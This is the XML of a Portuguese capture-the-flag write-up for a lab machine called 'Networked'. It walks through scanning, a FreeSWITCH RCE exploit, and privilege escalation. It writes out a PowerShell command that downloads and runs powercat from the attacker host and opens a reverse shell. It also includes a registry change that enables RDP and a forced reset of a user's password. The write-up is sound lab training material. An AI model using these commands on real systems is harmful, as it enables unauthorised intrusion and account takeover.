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DB47A" w14:textId="1A5C8F5A" w:rsidR="0021335C" w:rsidRDefault="00247907" w:rsidP="0024790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Networked</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF4426A" w14:textId="14A4CABB" w:rsidR="00247907" w:rsidRDefault="00247907" w:rsidP="00247907">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="110222E8" w14:textId="732880FF" w:rsidR="00247907" w:rsidRDefault="00FB6C87" w:rsidP="00247907">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Para começar a exploração da máquina, inicialmente foi rodado alguns scaners com o nmap, para entendermos melhor a máquina.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E9ACA5" w14:textId="6AD23E3B" w:rsidR="00FB6C87" w:rsidRDefault="00C70217" w:rsidP="002479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51FB1A" wp14:editId="0B11EC83">
            <wp:extent cx="5400040" cy="3694430"/>
            <wp:effectExtent l="0" t="0" r="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5AA4" w14:textId="1EE25225" w:rsidR="00C70217" w:rsidRDefault="00C70217" w:rsidP="00247907">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Descobrimos diversas portas abertas na máquina alvo. Com isso, realizamos mais enumerações com o nmap para descobrir os serviços ativos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D54669F" w14:textId="45A685E9" w:rsidR="00C70217" w:rsidRDefault="00C70217" w:rsidP="002479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831AB3" wp14:editId="38114809">
            <wp:extent cx="5400040" cy="2357755"/>
            <wp:effectExtent l="0" t="0" r="0" b="444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47FB" w14:textId="2D35BA11" w:rsidR="00FB6C87" w:rsidRDefault="00C70217" w:rsidP="0024790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71FF7" wp14:editId="1A0AD90E">
            <wp:extent cx="5400040" cy="2284095"/>
            <wp:effectExtent l="0" t="0" r="0" b="190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EFB4" w14:textId="3D9FB2AA" w:rsidR="00C70217" w:rsidRDefault="00C70217" w:rsidP="00247907">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Fazendo uma análise, descobrimos que existe um serviço vulnerável rodando na aplicação, o “</w:t>
      </w:r>
      <w:r w:rsidRPr="00C70217">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>FreeSWITCH 1.10.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8D0DC2" w14:textId="76A11973" w:rsidR="00C70217" w:rsidRDefault="00C70217" w:rsidP="00247907">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>É possível buscar por exploits online para ele.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D5A3795" w14:textId="1D5ED892" w:rsidR="00C70217" w:rsidRDefault="00C70217" w:rsidP="00485ECB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83687" wp14:editId="1B6A34C4">
            <wp:extent cx="4769022" cy="2495550"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5" name="Imagem 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69" cy="25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1EA5" w14:textId="1D4DA7F3" w:rsidR="00C70217" w:rsidRDefault="00C70217" w:rsidP="00247907">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Copiamos a </w:t>
      </w:r>
      <w:r w:rsidR="00485ECB">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>exploits para um arquivo python para podermos executar.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67365C84" w14:textId="383CEE7E" w:rsidR="00485ECB" w:rsidRDefault="00485ECB" w:rsidP="002479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492CDD" wp14:editId="77CA6838">
            <wp:extent cx="5400040" cy="2752725"/>
            <wp:effectExtent l="0" t="0" r="0" b="952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22C8" w14:textId="711505E5" w:rsidR="00485ECB" w:rsidRDefault="00485ECB" w:rsidP="00247907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Então com tudo pronto, vamos fazer um teste para ver se a exploits está realmente funcionando.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E90234B" w14:textId="64D17B97" w:rsidR="00485ECB" w:rsidRDefault="00B025B0" w:rsidP="00B02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3D1072" wp14:editId="58072A24">
            <wp:extent cx="4714875" cy="1304925"/>
            <wp:effectExtent l="0" t="0" r="9525" b="952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4903" w14:textId="5DB76B2A" w:rsidR="00B025B0" w:rsidRDefault="00B025B0" w:rsidP="00B025B0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Executando vimos que obtivemos com sucesso a RCE no sistema, agora temos que buscar pela reverse shell, para termos acesso completo na máquina.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609705BE" w14:textId="23CA5664" w:rsidR="00B025B0" w:rsidRDefault="00B025B0" w:rsidP="00B025B0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Depois de algum tempo tentando, descobrimos uma forma de obter a shell completa no sistema, para isso, vamos utilizar o netcat em formato powershell, seguindo o tutorial disponível no link: </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="0049218B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:i/>
            <w:iCs/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://www.hackingarticles.in/powershell-for-pentester-windows-reverse-shell/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42557A89" w14:textId="4BAE0E7B" w:rsidR="00B025B0" w:rsidRDefault="00B025B0" w:rsidP="00B025B0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Então baixamos o powercat.ps1 do github.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4321D3EA" w14:textId="6F6E608B" w:rsidR="00B025B0" w:rsidRDefault="00B025B0" w:rsidP="00B025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270218" wp14:editId="63BBC050">
            <wp:extent cx="5400040" cy="628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B666" w14:textId="62EC0E1B" w:rsidR="00B025B0" w:rsidRDefault="00B025B0" w:rsidP="00B025B0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Depois disso, abrimos a porta 443 na nossa máquina</w:t>
      </w:r>
      <w:r w:rsidR="009F278A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, abrimos um servidor http com o python, para que seja possível baixar a exploit da máquina da vítima</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> e executamos o comando que baixa o powercat e o usa para enviar sua shell.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F278A" w14:paraId="6D32B9BD" w14:textId="77777777" w:rsidTr="009F278A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8494" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="002060"/>
          </w:tcPr>
          <w:p w14:paraId="19264BB2" w14:textId="60AE6BE1" w:rsidR="009F278A" w:rsidRDefault="009F278A" w:rsidP="009F278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Payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F278A" w14:paraId="4D91EB66" w14:textId="77777777" w:rsidTr="009F278A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8494" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E0C6BD7" w14:textId="4AA5407D" w:rsidR="009F278A" w:rsidRPr="009F278A" w:rsidRDefault="009F278A" w:rsidP="00B025B0">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009F278A">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>python3 exploit.py 10.2.0.17 "powershell -c \"IEX(New-Object System.Net.WebClient).DownloadString('http://10.2.0.3/powercat.ps1');powercat -c 10.2.0.3 -p 443 -e cmd\""</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="59B115E9" w14:textId="25042392" w:rsidR="009F278A" w:rsidRDefault="009F278A" w:rsidP="00B025B0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AD5716E" w14:textId="6338BCC2" w:rsidR="009F278A" w:rsidRPr="009F278A" w:rsidRDefault="009F278A" w:rsidP="00B025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F95BC7" wp14:editId="276ABA91">
            <wp:extent cx="5400040" cy="2711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6344" w14:textId="1B9DB9D2" w:rsidR="009F278A" w:rsidRDefault="009F278A" w:rsidP="00B025B0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Com isso recebemos com sucesso a shell do sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CEE5FCB" w14:textId="1A319FED" w:rsidR="009F278A" w:rsidRDefault="009F278A" w:rsidP="00B025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353AEB" wp14:editId="10DA1A5A">
            <wp:extent cx="5400040" cy="1136015"/>
            <wp:effectExtent l="0" t="0" r="0" b="698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0788" w14:textId="6D547263" w:rsidR="009F278A" w:rsidRDefault="009F278A" w:rsidP="00B025B0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Com isso, conseguimos invadir com sucesso a máquina, agora vamos partir para a enumeração e tentar escalar nosso privilégio no sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB52D5C" w14:textId="0D045915" w:rsidR="009F278A" w:rsidRDefault="009F278A" w:rsidP="00B025B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Primeiramente vamos obter algumas informações básicas sobre o sistema com o comando systeminfo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ADA3A8A" w14:textId="15EA0A21" w:rsidR="009F278A" w:rsidRDefault="009F278A" w:rsidP="00B025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C76FE" wp14:editId="3172A328">
            <wp:extent cx="5400040" cy="3726180"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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4A3C" w14:textId="6376C65C" w:rsidR="009F278A" w:rsidRDefault="009F278A" w:rsidP="00B025B0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Vimos então que se trata de um Windows 10 Pro</w:t>
      </w:r>
      <w:r w:rsidR="00A37441">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA4ACC2" w14:textId="1A33E2F8" w:rsidR="00A37441" w:rsidRDefault="00A37441" w:rsidP="00B025B0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Vamos agora enumerar as permissões do nosso usuário com o comando net user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5396FAB7" w14:textId="651128C7" w:rsidR="00A37441" w:rsidRDefault="00A37441" w:rsidP="00A3744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D38065" wp14:editId="0050E08E">
            <wp:extent cx="3762375" cy="3412553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83" cy="341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35C7" w14:textId="48E7F777" w:rsidR="00A37441" w:rsidRDefault="00A37441" w:rsidP="00B025B0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Fazendo isso, vimos que estamos associados ao grupo de administradores do sistema, então temos alguns privilégios adicionais.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060D6D85" w14:textId="7FBFC1CE" w:rsidR="00A37441" w:rsidRDefault="00A37441" w:rsidP="00B025B0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Usando isso, podemos habilitar o RDP no sistema para que possamos nos conectar com uma interface gráfica, para isso, utilizamos o comando:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7AE7A8" w14:textId="08AB3008" w:rsidR="00A37441" w:rsidRDefault="00A37441" w:rsidP="00B025B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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">-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reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5E6A77" w14:textId="376222F6" w:rsidR="00A37441" w:rsidRDefault="00A37441" w:rsidP="00B025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040BA8" wp14:editId="18A97109">
            <wp:extent cx="5400040" cy="3213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1627" w14:textId="3208C20B" w:rsidR="00A37441" w:rsidRDefault="00A37441" w:rsidP="00B025B0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Agora com o RDP habilitado, temos que alterar a senha do usuário Mario, par que possamos nos conectar a ele, para isso, vamos usar o comando net user mario 123, mudando sua senha para 123.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1508E768" w14:textId="3BCB2A46" w:rsidR="00A37441" w:rsidRDefault="00A37441" w:rsidP="00280D0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5E6BA3" wp14:editId="096387F3">
            <wp:extent cx="3333750" cy="647700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8363" w14:textId="3AE8F60A" w:rsidR="00BF2D26" w:rsidRDefault="00BF2D26" w:rsidP="00BF2D26">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Agora com tudo concluído, podemos então nos autenticar com o RDP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1633B0F5" w14:textId="5A0FAE44" w:rsidR="00BF2D26" w:rsidRDefault="00C13CF8" w:rsidP="00BF2D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DE271D" wp14:editId="4F67BECD">
            <wp:extent cx="5400040" cy="2054860"/>
            <wp:effectExtent l="0" t="0" r="0" b="254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40D8" w14:textId="10561EE3" w:rsidR="00C13CF8" w:rsidRDefault="00C13CF8" w:rsidP="00327D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142A86" wp14:editId="6EF5CA69">
            <wp:extent cx="4363833" cy="3390900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="16" name="Imagem 16" descr="Tela de computador com fund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fundo azu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65" cy="339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A2A9" w14:textId="267AE337" w:rsidR="00C13CF8" w:rsidRDefault="00C13CF8" w:rsidP="00BF2D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 cara nos deparamos com um arquivo txt chamado user. Abrindo-o, podemos ver que é a flag de user do CTF.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C562BBD" w14:textId="470775F2" w:rsidR="00C13CF8" w:rsidRDefault="00C13CF8" w:rsidP="00BF2D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7C1676" wp14:editId="0FFF0FA2">
            <wp:extent cx="5400040" cy="4178300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9252" w14:textId="369EE87A" w:rsidR="00C13CF8" w:rsidRDefault="00C13CF8" w:rsidP="00BF2D26">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Agora temos que escalar nosso acesso para o usuário administrador, para que possamos completar o desafio.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094971BB" w14:textId="04F99930" w:rsidR="00C13CF8" w:rsidRDefault="00C13CF8" w:rsidP="00BF2D26">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Para isso, navegando pelo sistema, descobrimos um arquivo interessante chamado “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>notes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">”. Nesse arquivo mostra uma mensagem dando uma sugestão de senha para o próximo usuário que temos que nos conectar: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C13CF8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>calcuta901</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722BEAA6" w14:textId="69C314EE" w:rsidR="00C13CF8" w:rsidRDefault="00C13CF8" w:rsidP="009E1FB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8ACC22" wp14:editId="6579B407">
            <wp:extent cx="5303612" cy="4086225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23" cy="41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D70F" w14:textId="2062A2B6" w:rsidR="009A0924" w:rsidRDefault="009A0924" w:rsidP="009A0924">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Com essa informação, precisamos descobrir quais são os outros usuários da máquina, então indo em C://Users, descobrimos o usuário chamado networked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A59E291" w14:textId="0308E19C" w:rsidR="009A0924" w:rsidRDefault="009A0924" w:rsidP="00F2727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43A152" wp14:editId="5C958387">
            <wp:extent cx="5310505" cy="4105275"/>
            <wp:effectExtent l="0" t="0" r="4445" b="952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606" cy="411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C7B6" w14:textId="1F2EA58B" w:rsidR="009A0924" w:rsidRDefault="009A0924" w:rsidP="009A0924">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Vamos então tentar conseguir uma shell com esse usuário usando a senha encontrada, para isso vamos usar o comando “</w:t>
      </w:r>
      <w:r w:rsidRPr="009A0924">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>runas /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A0924">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>u:networked</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A0924">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> cmd.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”.</w:t>
      </w:r>
      <w:r w:rsidR="00F2727D">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Fazendo isso, foi solicitada a senha e inserimos a que encontramos anteriormente.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B917560" w14:textId="3051579E" w:rsidR="00F2727D" w:rsidRDefault="00F2727D" w:rsidP="00F2727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720A2E" wp14:editId="7484A52B">
            <wp:extent cx="4998822" cy="3876675"/>
            <wp:effectExtent l="0" t="0" r="0" b="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61" cy="388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1DBE" w14:textId="3C1D4852" w:rsidR="0020470E" w:rsidRDefault="0020470E" w:rsidP="0020470E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Então agora somos o usuário “networked” e podemos ir até o seu desktop para ver se encontramos a flag de root.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A6C50FB" w14:textId="004AED8B" w:rsidR="0020470E" w:rsidRDefault="0020470E" w:rsidP="002047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55C6A1" wp14:editId="04D4C151">
            <wp:extent cx="5372100" cy="2914650"/>
            <wp:effectExtent l="0" t="0" r="0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8C97" w14:textId="4F77E62B" w:rsidR="0020470E" w:rsidRPr="00C13CF8" w:rsidRDefault="0020470E" w:rsidP="0020470E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Pegando a última flag concluímos com sucesso o desafio proposto.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="0020470E" w:rsidRPr="00C13C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53F"/>
    <w:rsid w:val="000F6950"/>
    <w:rsid w:val="0020470E"/>
    <w:rsid w:val="0021335C"/>
    <w:rsid w:val="00247907"/>
    <w:rsid w:val="00280D0F"/>
    <w:rsid w:val="002A154B"/>
    <w:rsid w:val="00327DB3"/>
    <w:rsid w:val="00485ECB"/>
    <w:rsid w:val="009A0924"/>
    <w:rsid w:val="009E1FB8"/>
    <w:rsid w:val="009F278A"/>
    <w:rsid w:val="00A0253F"/>
    <w:rsid w:val="00A37441"/>
    <w:rsid w:val="00B025B0"/>
    <w:rsid w:val="00B94A51"/>
    <w:rsid w:val="00BF2D26"/>
    <w:rsid w:val="00C13CF8"/>
    <w:rsid w:val="00C70217"/>
    <w:rsid w:val="00F2727D"/>
    <w:rsid w:val="00FB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A1949"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{6A06E4CC-612B-4EDB-B180-BB935709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025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025B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9F2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hyperlink" Target="https://www.hackingarticles.in/powershell-for-pentester-windows-reverse-shell/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564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10</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-07-13T04:30:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-07-13T05:49:00Z</dcterms:modified>
</cp:coreProperties>
</file>